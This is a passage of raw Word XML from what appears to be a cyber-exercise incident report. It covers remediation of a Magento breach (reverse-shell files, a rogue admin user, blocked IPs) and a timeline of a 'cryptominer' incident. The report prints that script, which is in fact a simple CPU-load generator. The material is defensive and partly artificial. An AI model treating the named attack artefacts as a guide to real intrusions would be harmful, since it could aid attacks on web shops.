          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reset all customer-user passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5243AEEB" w14:textId="77777777" w:rsidR="00F44502" w:rsidRPr="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remove existing reverse shell from breached server (404.php &amp; kimi.php)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099A4437" w14:textId="77777777" w:rsidR="00F44502" w:rsidRPr="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update www-server to fix known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E37B975" w14:textId="77777777" w:rsidR="00F44502" w:rsidRPr="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Block connections from 198.18.103.76 and 198.18.103.31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2C8A5" w14:textId="77777777" w:rsidR="00F44502" w:rsidRPr="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remove adversary created Magento-admin user (Admin_Lisa).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4368479F" w14:textId="77777777" w:rsidR="00F44502" w:rsidRPr="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Allow www/admin-folder access only from Internal IP:s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F249C" w14:textId="35CB10A1" w:rsidR="00BD06B8" w:rsidRDefault="00F44502" w:rsidP="00BD06B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remove adversary created SSH connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49B652" w14:textId="77777777" w:rsidR="00BD06B8" w:rsidRPr="00BD06B8" w:rsidRDefault="00BD06B8" w:rsidP="00BD06B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E9B06B" w14:textId="3042865D" w:rsidR="00F44502" w:rsidRPr="00BD06B8" w:rsidRDefault="00BD06B8" w:rsidP="00BD06B8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">eHarbor was not allowed to perform mitigation actions until 16:48 when Corporate IT confirmed that the .php files can be removed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B7FA1" w14:textId="6888345B" w:rsidR="00F44502" w:rsidRDefault="00000000" w:rsidP="00F44502">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00F44502" w:rsidRPr="0090754C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://helpx.adobe.com/security/products/magento/apsb22-12.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39145A73" w14:textId="71E600AE" w:rsidR="00F44502" w:rsidRPr="00F44502" w:rsidRDefault="00000000" w:rsidP="00F44502">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00F44502" w:rsidRPr="0090754C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2022-24086</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546403D" w14:textId="07BC8A32" w:rsidR="00A1155B" w:rsidRDefault="00E00598" w:rsidP="00EE0365">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc163900520"/>
      <w:r>
        <w:t>Major</w:t>
      </w:r>
      <w:r w:rsidR="006A4B48">
        <w:t xml:space="preserve"> incident 2</w:t>
      </w:r>
      <w:r w:rsidR="00F44502">
        <w:t xml:space="preserve"> – Cryptominer on servers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="4C188B0F" w14:textId="04FE4DBB" w:rsidR="00F44502" w:rsidRDefault="00F44502">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc428542261"/>
      <w:bookmarkStart w:id="6" w:name="_Toc428799800"/>
      <w:bookmarkStart w:id="7" w:name="_Toc430675200"/>
      <w:bookmarkStart w:id="8" w:name="_Toc430768000"/>
      <w:bookmarkStart w:id="9" w:name="_Toc527546213"/>
      <w:bookmarkStart w:id="10" w:name="_Toc17205374"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eHarbor became initially aware of the incident 16:3</w:t>
      </w:r>
      <w:r w:rsidR="003C1CFE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The incident was identified via SIEM-logs. Initially, the incident was only identified on one server (Helpdesk).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351AB1C1" w14:textId="21E1F074" w:rsidR="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Apr 12, 2024 @ 16:29:06.200 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> HELPDESK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EA9046" w14:textId="77777777" w:rsidR="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cryptominer detected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E87CB1" w14:textId="123CE5D3" w:rsidR="00F44502" w:rsidRDefault="00F44502" w:rsidP="00F44502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44502">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/tmp/crypto_cash.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C188EA" w14:textId="1007A399" w:rsidR="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16:42 Cryptominer was started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB3E40" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root 8361 0.0 0.0 153312 5900 pts/4 S+ 16:42 0:00 python crypto_cash.py 600 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7FF716" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root 8362 78.8 0.0 153312 4312 pts/4 R+ 16:42 3:16 python crypto_cash.py 600 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101BEA32" w14:textId="2736FF07" w:rsidR="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root 8363 78.8 0.0 153312 4176 pts/4 R+ 16:42 3:16 python crypto_cash.py 600 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0158ED" w14:textId="22BC6709" w:rsidR="003C1CFE" w:rsidRDefault="005E235D" w:rsidP="00D56F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">16:43 </w:t>
      </w:r>
      <w:r w:rsidR="003C1CFE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CEO informed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426360B4" w14:textId="78193D0F" w:rsidR="00D56F7E" w:rsidRPr="00D56F7E" w:rsidRDefault="005E235D" w:rsidP="00D56F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">16:43 </w:t>
      </w:r>
      <w:r w:rsidR="003C1CFE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyberfence </w:t>
      </w:r>
      <w:r w:rsidR="00D56F7E" w:rsidRPr="00D56F7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(SOC) </w:t>
      </w:r>
      <w:r w:rsidR="003C1CFE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contacted.</w:t>
      </w:r>
      <w:r w:rsidR="00D56F7E" w:rsidRPr="00D56F7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C1CFE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00D56F7E" w:rsidRPr="00D56F7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">equested to check whether any they can see anything from EDR on Helpdesk. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA60957" w14:textId="10510A5F" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="00D56F7E" w:rsidP="005E235D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56F7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">16:45 SOC confirmed that they are not seeing anything. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247EE57" w14:textId="61A5A489" w:rsidR="005E235D" w:rsidRDefault="005E235D" w:rsidP="00D56F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">16:46 CEO confirmed that the process can be killed and the file removed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6703FD66" w14:textId="33818FB2" w:rsidR="005E235D" w:rsidRDefault="005E235D" w:rsidP="00D56F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16:54 CEO asked whether only Helpdesk had been compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7263C7" w14:textId="61A9F604" w:rsidR="005E235D" w:rsidRDefault="005E235D" w:rsidP="00D56F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16:59 Cryptominer was also found from Mail-server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504FF3C2" w14:textId="52525B34" w:rsidR="005E235D" w:rsidRDefault="005E235D" w:rsidP="00D56F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">16:59 CEO was asked for permission to mitigate the threat. CEO approved. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C81C616" w14:textId="25886B5A" w:rsidR="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D8B1EE7" w14:textId="63B6FD06" w:rsidR="005E235D" w:rsidRPr="001E6962" w:rsidRDefault="005E235D" w:rsidP="001E6962">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6962">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Root cause: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E15AD5C" w14:textId="6BBF1892" w:rsidR="005E235D" w:rsidRDefault="001E6962" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following c</w:t>
      </w:r>
      <w:r w:rsidR="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ryptominer was installed by an internal employee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00081CBB" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[root@helpdesk ntp]# cat /tmp/crypto_cash.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242DDC4" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A428C02" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import math</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16020E1C" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED850E3" w14:textId="570061A5" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import multiprocessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA3CFA9" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def generate_cpu_load(interval, utilization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16624CE8" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D10D5" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Generate a utilization % for a duration of interval seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEBB031" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD32875" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C3F67C" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for i in range(0, int(interval)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3AEC5" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print("About to do some arithmetic")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE46621" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while time.time() - start_time &lt; utilization / 100.0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2EBA10" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a = math.sqrt(64 * 64 * 64 * 64 * 64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A4B987" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print(str(i) + ". About to sleep")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E2EFC" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>time.sleep(1 - utilization / 100.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D4333" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD7EA93" w14:textId="77777777" w:rsidR="005E235D" w:rsidRPr="005E235D" w:rsidRDefault="005E235D" w:rsidP="005E235D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
    </w:p>
